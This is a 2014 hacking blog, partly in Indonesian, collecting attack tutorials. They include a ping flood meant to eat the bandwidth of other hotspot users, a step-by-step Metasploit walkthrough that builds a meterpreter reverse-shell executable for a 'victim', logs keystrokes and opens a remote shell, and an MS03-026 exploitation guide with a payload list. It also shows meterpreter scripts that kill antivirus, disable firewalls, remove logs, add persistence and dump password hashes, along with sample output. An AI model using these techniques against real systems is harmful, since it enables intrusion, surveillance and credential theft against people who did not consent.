Monday, 16 June 2014

Cara Hack Wifi menggunakan CMD

Cara Hack Wifi Menggunakan CMD


1. buka CMD, klik start -> all programs -> Command prompt.
2. Setelah jendela CMD terbuka ketikkan perintah ipconfig /all.
3. Setelah itu cari target DNS server lihat tampilan di bawah.

jadi target kita kali ini 10.0.1.2

4.  Sekarang ketikkan perntah ping -L 500 10.0.1.2 -t lalu tekan enter : 10.0.1.2 adalah target kalian, silahkan ganti dengan DNS korban anda.
5. Setelah itu akan muncul gambar seperti dibawah ini

cara ini berfungsi untuk menyedot bandwith pengguna yang main di area sekitar hotspot tersebut.

pada ping- L 500 10.0.1.2 -tanda juga bisa mengubah angka 500 jadi 1000 atau lebih, tapi jangan terlalu berlebihan ya, kasian pengguna lain.
Posted by at No comments:

Monday, 9 June 2014

Hacking Metasploit Tutorial

Metasploit Tutorial - With an example | Exploiting the vulnerabilities

Posted by Aneesh M. Makker at 5:40 AM / Categories: /
--- The Metasploit Framework ---


Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.
Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).
In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.
Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.
Payload: Actual code which runs on the compromised system after exploitation
Now, what Metasploit IS?
It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.



METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.
I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.
For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.
Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.
The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~#/etc/init.d/wicd start
to start the wicd manager
Finally, type "startx" to start the GUI mode:
root@bt:~#startx

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfig
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now be having a shell something similar to a command prompt in windows.
msf >
Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.
(Everything has to be entered without quotes)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#
Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.
Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.
Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444
All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011
You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps
Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >
Type in the following:
meterpreter > use priv
Now, if you want to start the Keylogger activity on victim, just type keyscan_start
Now, if you want to go to the victim’s computer,
Jus type shell
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>
Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystrokes...
Posted by at No comments:

Cara Mematikan/mendisable CTRL+U / CTRL+S

Mematikan/mendisable CTRL+U dan CTRL+S ,, yaitu agar blog kita aman dari orang-orang yang mungkin akan meng-copas artikel yang kita buat. Emm memang terkadang sebagian besar orang tidak suka jika artikelnya di copas / copi-paste mentah-mentah tanpa perubahan bahasa penulisannya, tapi ada juga yang mempersilahkan mengcopas blognya. Tapi gua sarankan kepada sobat jika ingin membuat artikel buatlah dengan tata bahasa kalian sendiri agar terkesan lebih menarik dan membanggakan dengan apa yang telah kita buat, Sehingga yang membaca artikel kita terasa bersahabat kepada kita. Naah untuk kalian yang ingin mempraktekan totorial ini silahkan disimak sedikit uraian buat kalian tentang bagaimana cara mematikan/mendisable CTRL+U dan CTRL+S agar Blog menjadi Aman. Silahkan disimak tutorialnya dibawah ini :
 

                   



Cara Mematikan/mendisable CTRL+U / CTRL+S agar Blog menjadi Aman

  • Login ke blogger.
  • Template - Edit HTML
  • Setelah itu cari kode <body> dan ganti dengan kode dibawah ini :

<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'> 

  • Kemudian Save Template!

 Keterangan :
  1. oncontextmenu=’return false;’ (Untuk mematikan fungsi klik kanan)
  2. onkeydown=’return false;’ (Untuk mematikan CTRL+A dan CTRL+U)
  3. onmousedown=’return false;’ (Untuk mematikan fungsi block pada artikel)
  4. ‘return false;’ (Untuk mengaktifkan fungsi pada masing-masing Java Script,kalau ingin dinonaktifkan salah satu ganti saja dengan ‘return true; )
 

Untuk blog/web yang berisi tutorial yang isinya berisi script-script yang harus dicopy, mazinu sarankan untuk menggunakan script yang seperti dibawah ini :

<body oncontextmenu='return true;' onkeydown='return false;' onmousedown='return true;'>

Cukup sekian Artikel tentang Cara Mematikan/mendisable CTRL+U / CTRL+S yang bisa ogreman postingkan. Tapi dengan kalian Mematikan/mendisable CTRL+U / CTRL+S itu bagi para master-master blogger tetap tidak berpengaruh, karena mereka punya tips untuk mengambil artikel dengan cara lain. Jadi kesimpulannya dengan cara ini artikel kita tidak 100% aman dari ancaman copas, jadi setiap kita buat postingan mazinu sarankan agar menyarankan pembaca artikel kita untuk mencantumkan Link sumber dari blog kita jika akan menyebarluaskan yang sudah kita buat, yang biasanya tertulis di Permalink Blog seperti punya mazinu dibawah ini! Semoga Bermanfaat.
Posted by at No comments:

Metasploit

Cara Menyusup Komputer Orang Dengan Metasploit - Mari kita belajar Cara Menyusup Komputer Orang Dengan Metasploit. adalah METAPLOIT Framework ver. 2.6. Aplikasi ini berfungsi untuk mengexploitasi kelemahan suatu system ataupun aplikasi. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1. Untuk lebih lengkapnya dapat di baca di website resminya www.metasploit.com.

Ketika saya menulis artikel ini, metasploit sudah merilis yang versi 3.5, tapi saya menggunakan versi 2.6, karna pada dasarnya sama saja, hanya saja versi 3.5 lebih banyak exploitnya  . Oh iya, dalam Metasploit Framework, kita sudah disediakan banyak exploit, sehingga tidak perlu mendownload lagi. Fungsi exploit yaitu mengirim bufferOverflow pada system korban, sehingga kita dapat menTakeOver shellnya.
Langsung saja, berikut installasinya di Windows.

1. Download dulu di webiste resminya www.metasploit.com, jika tak ada ver. 2.6, coba cari aja di Google,  usaha sedikit gan.

2.  Kemudian install, dan jalankan msfweb.


Maka akan muncul window shell seperti berikut.


3. Buka Web Browser bisa Internet Explorer, Mozilla, OperaMini, dll. Dan pergi kehttp://127.0.0.1:55555, maka tampilannya seperti berikut.

Mungkin tampilan web gui anda akan sedikit berbeda, karena templatenya disini telah saya ganti.

4. Kemudian cari corban yang akan kita exploitasi. Bisa menggunakan NMAP, terus kita lakukan port scanning. Disini kita akan mencoba pada system OS Windows Server 2003 yg masih fresh install (belum di Patch). Pada port scanning, pastikan port untuk MSRPC tebuka (default = open). Download NMAP di www.nmap.org

5.Memilih Exploit.
Pada Metasploit Web Interface, di bagian FILTER MODULES pilih “app :: dcom”, setelah itu pilih exploit Microsoft RPC DCOM MSO3-026.

Pilih target pada pilihan Select Target

6. Memilih Payload

Pilih salah satu payload diatas, jika masih bingung, pilih saja win32_bind, yang akan mengexploitasi dan langsung masuk ke command shell target. Berikut beberapa fungsi2 payload :

win32_adduser : menambah user pada system korban
win32_bind : masuk ke shell korban
win32_bind_dllinject : untuk upload / inject dll files
win32_bind_meterpreter : exploitasi dengan menjalankan meterpreter (i like it  ).
win32_bind_vncinject : inject vncserver pada system korba (untuk kita remote melalui vncviewer).
win32_downloadexec : mendownload dan mengeksekusi aplikasi pada pc korban
win32_exec : mengeksekusi command di system korban.
Sedangkan BIND, PASSIVE, REVERSE, pada dasarnya sama saja.


RHOST ==>> Ip Address Korban (Remote).
LHOST ==>> Ip Address Kita (Local)
RPORT ==>> Port Korban
LPORT ==>> Local Open Port


Setelah diisi semua, kemudian klik exploit untuk mengHack. Hahaha 
, selamat mencoba.
Posted by at No comments:

Tuesday, 27 May 2014

Tutor exploits Backtrack 5

Information security is a broad field and it involves the penetration testing and computer forensic as well, there are so many tools are available to perform the penetration testing on the target, Metasploit is one of the best tool among them. Meterpreter is a powerful feature of metasploit that uses DLL injection to communicate over the socket. Meterpreter works on the client-side by providing a powerful environment to communicate, to transfer files.


A meterpreter session can be established after successfully exploiting the host. Available meterpreter scripts on a metasploit database automate multiple processes, such as:

  • Capture the screen
  • Keylogging
  • File transfer
  • Service detection and more
Even with numerous meterpreter scripts available, you are free to write and to create your own script that is best suited to your work. Some important aspects about the meterpreter script would be:
  • Written in Ruby programming language
  • Located in the metasploit directory
  • Meterpreter scripts are creating everyday by different authors click here to check the list.
  • Meterpreter scripts are very helpful to automate the process after compromising the host
  • Meterpreter scripts are based on API and you can get more information here.
There are so many meterpreter scripts that are available publicly for you to use, but if you want to create a new meterpreter script of your own and for public usage, this is readily doable. All you need to do is to follow some rules and regulations so that your script does not conflict with the standard variables. Ruby programming language is a basic need in order to write a script for meterpreter. Other important rules to follow are:
  • Always use description so that the others will understand it
  • Use local variable not global variable
  • Always provide help option for better usage
  • Keep in mind the target host (operating system, service pack (if windows), Kernel (for Unix) ) while creating a script, because all the system’s software does not contain all types of vulnerabilities
Let us consider an example: in our scenario, we need to create an infected file (a backdoor) so that we can send it to the victim. Metasploit needn’t be that big of a deal; you can even create a backdoor by using fast-track.

root@bt:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2
LPORT=4444 Desktop > test.jpg
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}


As we have typed all the things in, we can automate the process by creating a new script:
root@bt:/pentest/exploits/framework3# touch a.rb
root@bt:/pentest/exploits/framework3# echo msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.2 LPORT=4444 Desktop > test.jpg
root@bt:/pentest/exploits/framework3# ruby a.rb
root@bt:/pentest/exploits/framework3#

The result is the same. It is also possible to create a jpg file but that method is fast. Since the time-consuming method is repeating the same step, why not create a script for that to do all these jobs automatically? There are different meterpreter scripts are available; just look at the picture below.


This is just one small example. Let’s create a script taking advantage of a vulnerability that will exploit an operating system:

root@bt:/pentest/exploits/framework3# touch test.rc
root@bt:/pentest/exploits/framework3# echo use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
root@bt:/pentest/exploits/framework3# echo set RHOST 192.168.1.6
set RHOST 192.168.1.6
root@bt:/pentest/exploits/framework3# echo exploit
exploit
root@bt:/pentest/exploits/framework3# msfconsole -r test.rc

Beyond this, if we use the manual technique to do then job, then we will need to define:
  • The exploit for this case (well I have used nessus before that is why I know the system is vulnerable to ms08-067-netapi bug)
  • We need to set the remote host manually
  • We need to set local host and port manually
After the execution, the meterpreter session must be active if and only if the operating system is vulnerable, such as in this case:


Now in this meterpreter session, we are able to call different scripts. We can also create our own script as well, as discussed above. Below, I will show you some of the best meterpreter scripts. These are highly useful in the process of penetration testing; however, developers are refining these scripts daily, so be active in the community and on different blogs and forums to keep yourself updated.

Screenspy Script

This is the basic script that will capture the screen of the victim’s computer. All you need to do is type in “run screenspy.” To get help of usage, just type in “run screenspy -h” on the meterpreter screen. After the execution, Firefox will open with a picture of the victim’s computer at that moment.

KillAv Script

Killav script is a pretty famous script. As the name suggests, it will kill (close) antivirus softwares, so if you don’t want that antivirus’ software to disturb you, be sure to kill all of these antivirus softwares by using this script:

meterpreter > run killav
  [*] Killing Antivirus services on the target...
  meterpreter >

Killav contains the information on most of the better known anti-virus’s, but if there is a new anti-virus, then you will need to edit this script for the best performance. As before with the script file, we can find the famous anti-virus exe name:
  • winppr32.exe
  • winrecon.exe
  • winservn.exe
  • winssk32.exe
  • winstart.exe
  • winstart001.exe
  • wintsk32.exe
  • winupdate.exe
  • wkufind.exe
  • wnad.exe
  • wnt.exe
  • wradmin.exe
  • wrctrl.exe
  • wsbgate.exe
  • wupdater.exe
  • wupdt.exe
  • wyvernworksfirewall.exe
  • xpf202en.exe
  • zapro.exe
  • zapsetup3001.exe
  • zatutor.exe
  • zonalm2601.exe
  • zonealarm.exe

Getcountermeasure Script

Killav is a power script and it can kill a lot of different anti-virus’s, but the problem is that when you implement killav, windows may show some types of errors and other alerts, not to mention firewalls. This is remedied by a wonderful script called Getcountermeasure:

meterpreter > run getcountermeasure -h
  Getcountermeasure -- List (or optionally, kill) HIPS and AV
  processes, show XP firewall rules, and display DEP and UAC
  policies

  OPTIONS:

  -d Disable built in Firewall
  -h Help menu.
  -k Kill any AV, HIPS and Third Party Firewall process found.

Just imagine how powerful this script is! It has an ability to fight against Firewall, Anti-virus, IPS and even third party firewall that are so very common nowadays. It is really better than Killav. To use it:

meterpreter > run getcountermeasure -d 

  [*] Running Getcountermeasure on the target...
  [*] Checking for contermeasures...
  [*] Getting Windows Built in Firewall configuration...
  [*]
  [*]     Domain profile configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]     Exception mode = Enable
  [*]
  [*]     Standard profile configuration (current):
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Disable
  [*]     Exception mode = Enable
  [*]
  [*]     Local Area Connection firewall configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]
  [*] Disabling Built in Firewall.....
  [*] Checking DEP Support Policy...
Try to understand the power of this wonderful script: it will remove security logs as well look at the picture.

Gettelnet script

Telnet is one of the most famous services on the windows operating system. It will allow a remote connection, so if you want to open telnet on the victim’s computer for future use, then it is a good script to use. However, as an advance we can use SSH service for remote connection. We can also install netcat as a backdoor on a compromised host for future connections. Use this command to get more help
  meterpreter > gettelnet -h

There are a lot of different scripts are available but here we will discuss only the most important ones. These will help you to understand the network as well as help you for future connections:
Net Enum- Network Enumeration Script
Netenum is a network enumeration script that is a wonderful script for:
  • Domain Name for DNS Forward Lookup
  • To Perform DNS Forward Lookup on host list and domain
  • The target address range or CIDR identifier
  • To Perform DNS lookup of MX and NS records for a domain
  • To Perform Service Record DNS lookup for a domain
  • To Perform Ping Sweep on IP Range

Checkvm- Check Virtual Machine

Virtual machines are now an important part of enterprise network and most of the large (and even small) networks are using them. Checkvm is a script that will let you monitor the status of the victim, whether on virtual machine or not. It will also let you see the type of virtual machine. Here is the output of this case:

 meterpreter > run checkvm
  [*] Checking if target is a Virtual Machine .....
  [*] This is a Sun VirtualBox Virtual Machine
  meterpreter >

Virus Scan Bypass

Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder, adds it to exclusion list and sets it to run at startup. Though we have discussed two scripts that kill anti-virus protections, it is good to run different scripts to verify your attack.
  
  meterpreter > run virusscan_bypass -h

Enable RDP- Getgui

If you want a graphical user interface of the victim’s computer, then you need to open a service called RDP (remote desktop protocol):
  meterpreter > run getgui -e
  [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
  [*] Carlos Perez carlos_perez@darkoperator.com
  [*] Enabling Remote Desktop
  [*]     RDP is disabled; enabling it ...
  [*] Setting Terminal Services service startup mode

Hashdump

Last but not the least: I really don’t want to end this article without sharing hashdump, in case you want to secure password hashes from the victim for future use. In some cases, these hashes works on other platforms:

 meterpreter > run hashdump
  [*] Obtaining the boot key...
  [*] Calculating the hboot key using SYSKEY 374d90e7c3ff37a0d6064c461200ca22...
  [*] Obtaining the user list and keys...
  [*] Decrypting user keys...
  [*] Dumping password hashes...
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::
- See more at: http://www.ehacking.net/2012/05/metasploit-meterpreter-scripting.html#sthash.YNdE7cVj.dpuf
Posted by at No comments:
Subscribe to: Posts (Atom)